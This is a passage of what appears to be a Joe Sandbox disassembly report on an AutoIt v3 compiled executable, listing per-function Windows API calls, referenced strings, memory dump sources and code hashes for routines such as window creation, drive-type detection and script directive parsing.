SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B979DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B979ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B97A35
GetClientRect.USER32(00000000,?), ref: 00B97A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B97A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B97A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B97AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B97ABB
GlobalLock.KERNEL32(00000000), ref: 00B97AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B97AD3
GlobalUnlock.KERNEL32(00000000), ref: 00B97ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B97AE3
GlobalFree.KERNEL32(00000000), ref: 00B97AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B97B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BB2CAC,00000000), ref: 00B97B16
GlobalFree.KERNEL32(00000000), ref: 00B97B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B97B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B97B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B97B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B97D7A

Strings

static, xrefs: 00B97A75, 00B97BCC
, xrefs: 00B97D00
DISPLAY, xrefs: 00B97BDD
AutoIt v3, xrefs: 00B97A2D

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 8b38921a9e2d0b55550a416edff505cf5921c3f10f772e7c7a24609a7fa1701c
Instruction ID: 37e5135197bd46c522f57e8ac1e59033f105f332ac94a1ba6476bff660d69f41
Opcode Fuzzy Hash: 8b38921a9e2d0b55550a416edff505cf5921c3f10f772e7c7a24609a7fa1701c
Instruction Fuzzy Hash: D5025A71910115AFDF14DFA8DC89EAE7BF9EF49310F1481A9F915AB2A1CB30AD41CB60

Function 00BA356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00BAF910), ref: 00BA3627
IsWindowVisible.USER32(?), ref: 00BA364B

Strings

SENDCOMMANDID, xrefs: 00BA39DA
SETCURRENTSELECTION, xrefs: 00BA37B6
ISVISIBLE, xrefs: 00BA3637
SELECTSTRING, xrefs: 00BA3806
HIDEDROPDOWN, xrefs: 00BA3700
CURRENTTAB, xrefs: 00BA36BD
ADDSTRING, xrefs: 00BA3716
GETLINE, xrefs: 00BA399B
ISENABLED, xrefs: 00BA366B
GETSELECTED, xrefs: 00BA38A3
EDITPASTE, xrefs: 00BA395F
FINDSTRING, xrefs: 00BA3776
GETCURRENTCOL, xrefs: 00BA3928
GETLINECOUNT, xrefs: 00BA38C6
GETCURRENTLINE, xrefs: 00BA38ED
GETCURRENTSELECTION, xrefs: 00BA37E3
CHECK, xrefs: 00BA386D
TABRIGHT, xrefs: 00BA369D
ISCHECKED, xrefs: 00BA3839
SHOWDROPDOWN, xrefs: 00BA36E0
TABLEFT, xrefs: 00BA3687
DELSTRING, xrefs: 00BA3749
UNCHECK, xrefs: 00BA3883

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: d3682d18a50038c42992801276c28a62e9599f6ff870acf54f7f9a6c10c26da8
Instruction ID: 140a024b3ac02c06176a4d8e558f715b2611c3415deac28666f8d9eeacda4fc3
Opcode Fuzzy Hash: d3682d18a50038c42992801276c28a62e9599f6ff870acf54f7f9a6c10c26da8
Instruction Fuzzy Hash: A3D1A4312183119FCB04EF14C455A6EB7E1EF96784F1444E9F89A5B3A2DB31DE4ACB81

Function 00BAA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00BAA630
GetSysColorBrush.USER32(0000000F), ref: 00BAA661
GetSysColor.USER32(0000000F), ref: 00BAA66D
SetBkColor.GDI32(?,000000FF), ref: 00BAA687
SelectObject.GDI32(?,00000000), ref: 00BAA696
InflateRect.USER32(?,000000FF,000000FF), ref: 00BAA6C1
GetSysColor.USER32(00000010), ref: 00BAA6C9
CreateSolidBrush.GDI32(00000000), ref: 00BAA6D0
FrameRect.USER32(?,?,00000000), ref: 00BAA6DF
DeleteObject.GDI32(00000000), ref: 00BAA6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00BAA731
FillRect.USER32(?,?,00000000), ref: 00BAA763
GetWindowLongW.USER32(?,000000F0), ref: 00BAA78E

Part of subcall function 00BAA8CA: GetSysColor.USER32(00000012), ref: 00BAA903
Part of subcall function 00BAA8CA: SetTextColor.GDI32(?,?), ref: 00BAA907
Part of subcall function 00BAA8CA: GetSysColorBrush.USER32(0000000F), ref: 00BAA91D
Part of subcall function 00BAA8CA: GetSysColor.USER32(0000000F), ref: 00BAA928
Part of subcall function 00BAA8CA: GetSysColor.USER32(00000011), ref: 00BAA945
Part of subcall function 00BAA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BAA953
Part of subcall function 00BAA8CA: SelectObject.GDI32(?,00000000), ref: 00BAA964
Part of subcall function 00BAA8CA: SetBkColor.GDI32(?,00000000), ref: 00BAA96D
Part of subcall function 00BAA8CA: SelectObject.GDI32(?,?), ref: 00BAA97A
Part of subcall function 00BAA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00BAA999
Part of subcall function 00BAA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BAA9B0
Part of subcall function 00BAA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00BAA9C5
Part of subcall function 00BAA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BAA9ED

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 86fc403022c41c57e15c09aaace3d696334fa51e7bf780d8b010c5d609267612
Instruction ID: 43c452b1b93043ea8c9307e4c0c5d90bd4230d0aa2bd35bebc8e5ac357cd1a0b
Opcode Fuzzy Hash: 86fc403022c41c57e15c09aaace3d696334fa51e7bf780d8b010c5d609267612
Instruction Fuzzy Hash: 85916F71408302AFC7109FA4DC49AAB7BE9FF4A321F144B29F5A2971A0DB71D945CB62

Function 00B22C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00B22CA2
DeleteObject.GDI32(00000000), ref: 00B22CE8
DeleteObject.GDI32(00000000), ref: 00B22CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00B22CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00B22D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00B5C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B5C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B5C89D

Part of subcall function 00B21B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B22036,?,00000000,?,?,?,?,00B216CB,00000000,?), ref: 00B21B9A

SendMessageW.USER32(?,00001053), ref: 00B5C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B5C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B5C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B5C912

Strings

0, xrefs: 00B5C731

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 898da17a3e6c09afbba4edba9373e5b0568e1a09a1a9ba98ebbb819913096001
Instruction ID: dddeccc044e452b67d830ad50adcbbe2f48fdcb70656de2a34e7567834e8fcd2
Opcode Fuzzy Hash: 898da17a3e6c09afbba4edba9373e5b0568e1a09a1a9ba98ebbb819913096001
Instruction Fuzzy Hash: 9A128D30604211AFDB25DF24D885BA9BBE2FF09311F5445E9F999CB262CB31EC46CB91

Function 00B974AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00B974DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B9759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B975DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B975ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B97633
GetClientRect.USER32(00000000,?), ref: 00B9763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B97683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B97692
GetStockObject.GDI32(00000011), ref: 00B976A2
SelectObject.GDI32(00000000,00000000), ref: 00B976A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B976B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B976BF
DeleteDC.GDI32(00000000), ref: 00B976C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B976F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B9770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B97746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B9775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B9776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B9779B
GetStockObject.GDI32(00000011), ref: 00B977A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B977B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B977BB

Strings

static, xrefs: 00B9767D, 00B97795
DISPLAY, xrefs: 00B97688
AutoIt v3, xrefs: 00B9762B
msctls_progress32, xrefs: 00B9773C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: db68cfd0b257f35e547d9fe0e0ef120a561033c517cefe704ef9cf47c178193a
Instruction ID: 6042008914cf3d649bf2812ec2a645228734ce387c9bf71e40e3a78f1d30781e
Opcode Fuzzy Hash: db68cfd0b257f35e547d9fe0e0ef120a561033c517cefe704ef9cf47c178193a
Instruction Fuzzy Hash: B7A16071A40619BFEB24DBA4DC4AFBE7BB9EB05714F044154FA15AB2E0DB70AD00CB64

Function 00B8AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B8AD1E
GetDriveTypeW.KERNEL32(?,00BAFAC0,?,\\.\,00BAF910), ref: 00B8ADFB
SetErrorMode.KERNEL32(00000000,00BAFAC0,?,\\.\,00BAF910), ref: 00B8AF59

Strings

Network, xrefs: 00B8AE39
\\.\, xrefs: 00B8AD70
SAS, xrefs: 00B8AF05
Fixed, xrefs: 00B8AE43
RAMDisk, xrefs: 00B8AE25
ATA, xrefs: 00B8AED4
ATAPI, xrefs: 00B8AECD
SSD, xrefs: 00B8AE86
MMC, xrefs: 00B8AF1A
iSCSI, xrefs: 00B8AEFE
SSA, xrefs: 00B8AEE2
FileBackedVirtual, xrefs: 00B8AF28
Fibre, xrefs: 00B8AEE9
Unknown, xrefs: 00B8AE1B, 00B8AEBF
SCSI, xrefs: 00B8AEC6
Virtual, xrefs: 00B8AF21
CDROM, xrefs: 00B8AE2F
PhysicalDrive, xrefs: 00B8ADA7
Removable, xrefs: 00B8AE4D
SATA, xrefs: 00B8AF0C
RAID, xrefs: 00B8AEF7
USB, xrefs: 00B8AEF0
1394, xrefs: 00B8AEDB

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 1c0317dee1ec44825a30815851f515ff04221f34667886a117005e21bd6db7e8
Instruction ID: 46a06976433ff3954dadebeac10981eb6a2bd8612d3dfc551c5c8c3705eb2b04
Opcode Fuzzy Hash: 1c0317dee1ec44825a30815851f515ff04221f34667886a117005e21bd6db7e8
Instruction Fuzzy Hash: 6C5163B0644206AB9B10FB50C9D2DBDB3E1EB49702B2044E7E50BEB2B1EE719D41DB53

Function 00B268DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00B26931
__wcsnicmp.LIBCMT ref: 00B26949
__wcsnicmp.LIBCMT ref: 00B26961
__wcsnicmp.LIBCMT ref: 00B26979
__wcsnicmp.LIBCMT ref: 00B26991
__wcsnicmp.LIBCMT ref: 00B269A9
__wcsnicmp.LIBCMT ref: 00B269C1
__wcsnicmp.LIBCMT ref: 00B269D5
__wcsnicmp.LIBCMT ref: 00B26A16
__wcsnicmp.LIBCMT ref: 00B26A2A
__wcsnicmp.LIBCMT ref: 00B26A3E
__wcsnicmp.LIBCMT ref: 00B26A52

Strings

#cs, xrefs: 00B269CF, 00B26A24
#include, xrefs: 00B269A3
#OnAutoItStartRegister, xrefs: 00B26973
Cannot parse #include, xrefs: 00B5E3F0
#ce, xrefs: 00B26A4C
#requireadmin, xrefs: 00B2695B
Unterminated group of comments, xrefs: 00B5E403
#pragma compile, xrefs: 00B2692B
#notrayicon, xrefs: 00B26943
Bad directive syntax error, xrefs: 00B5E31A
#comments-end, xrefs: 00B26A38
#include-once, xrefs: 00B2698B
#comments-start, xrefs: 00B269BB, 00B26A10

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 274d6b072b527f3cc55469f6aa68525c06b21488bb26e57ee7718b6e2b9378f0
Instruction ID: ca60fce1ff6e099eb7164f23059e5c1897f7e011d51c1ffd300a33e8fe1197f2
Opcode Fuzzy Hash: 274d6b072b527f3cc55469f6aa68525c06b21488bb26e57ee7718b6e2b9378f0
Instruction Fuzzy Hash: C58107B16402256ACB25AB60EC82FBF37E8EF05700F0840E5FD49AA192EB71DF45D665

Function 00BA9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00BA9AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00BA9B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00BA9BA7

Strings

0, xrefs: 00BA9BE4

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 28e77864c802249b088f72c570be416083faabe13cf783a5346ca6fcfdefdba3
Instruction ID: a409d31088a5fb4c20d8afe729a14f59fbf00103bdc94a6bea38093add225d39
Opcode Fuzzy Hash: 28e77864c802249b088f72c570be416083faabe13cf783a5346ca6fcfdefdba3
Instruction Fuzzy Hash: AD02D130108301AFDB25CF14C889BAABBE5FF86314F0485ADF995D62A1D735D944EB51

Function 00BAA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00BAA903
SetTextColor.GDI32(?,?), ref: 00BAA907
GetSysColorBrush.USER32(0000000F), ref: 00BAA91D
GetSysColor.USER32(0000000F), ref: 00BAA928
CreateSolidBrush.GDI32(?), ref: 00BAA92D
GetSysColor.USER32(00000011), ref: 00BAA945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BAA953
SelectObject.GDI32(?,00000000), ref: 00BAA964
SetBkColor.GDI32(?,00000000), ref: 00BAA96D
SelectObject.GDI32(?,?), ref: 00BAA97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00BAA999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BAA9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00BAA9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BAA9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BAAA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00BAAA32
DrawFocusRect.USER32(?,?), ref: 00BAAA3D
GetSysColor.USER32(00000011), ref: 00BAAA4B
SetTextColor.GDI32(?,00000000), ref: 00BAAA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BAAA67
SelectObject.GDI32(?,00BAA5FA), ref: 00BAAA7E
DeleteObject.GDI32(?), ref: 00BAAA89
SelectObject.GDI32(?,?), ref: 00BAAA8F
DeleteObject.GDI32(?), ref: 00BAAA94
SetTextColor.GDI32(?,?), ref: 00BAAA9A
SetBkColor.GDI32(?,?), ref: 00BAAAA4

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 9802193d63b715dcb0d2666d5df149cc1ca86489258d3f9dd0e60ce4c55d3f64
Instruction ID: 46143ed0952d9d627b877cce0b3abb1b3c0c8a7f2b3b210efe4918bc67b2dbfd
Opcode Fuzzy Hash: 9802193d63b715dcb0d2666d5df149cc1ca86489258d3f9dd0e60ce4c55d3f64
Instruction Fuzzy Hash: A7513C71900209FFDB119FA4DC49EEE7BB9EB0A320F114265F911AB2A1DB719940DFA0

Function 00BA89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BA8AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BA8AD2
CharNextW.USER32(0000014E), ref: 00BA8B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BA8B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BA8B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BA8B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BA8B86
SetWindowTextW.USER32(?,0000014E), ref: 00BA8BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BA8BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00BA8C1F
_memset.LIBCMT ref: 00BA8C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BA8C8D
_memset.LIBCMT ref: 00BA8CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BA8D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00BA8D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00BA8E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00BA8E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BA8E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BA8EB4
DrawMenuBar.USER32(?), ref: 00BA8EC3
SetWindowTextW.USER32(?,0000014E), ref: 00BA8EEB

Strings

0, xrefs: 00BA8E55

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: eaf27f953abdf00703c624fb3b40ef96d539acc14d7e636c561bda38f39c7547
Instruction ID: 146ca662722ef81557414f8016f953bb6cebb68f4e31ba09202279574789bf69
Opcode Fuzzy Hash: eaf27f953abdf00703c624fb3b40ef96d539acc14d7e636c561bda38f39c7547
Instruction Fuzzy Hash: 65E17F70904219AFDB209F64CC85EEE7BF9EF0A710F148196F915AB590DF758A80DF60

Function 00BA488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BA49CA
GetDesktopWindow.USER32 ref: 00BA49DF
GetWindowRect.USER32(00000000), ref: 00BA49E6
GetWindowLongW.USER32(?,000000F0), ref: 00BA4A48
DestroyWindow.USER32(?), ref: 00BA4A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BA4A9D
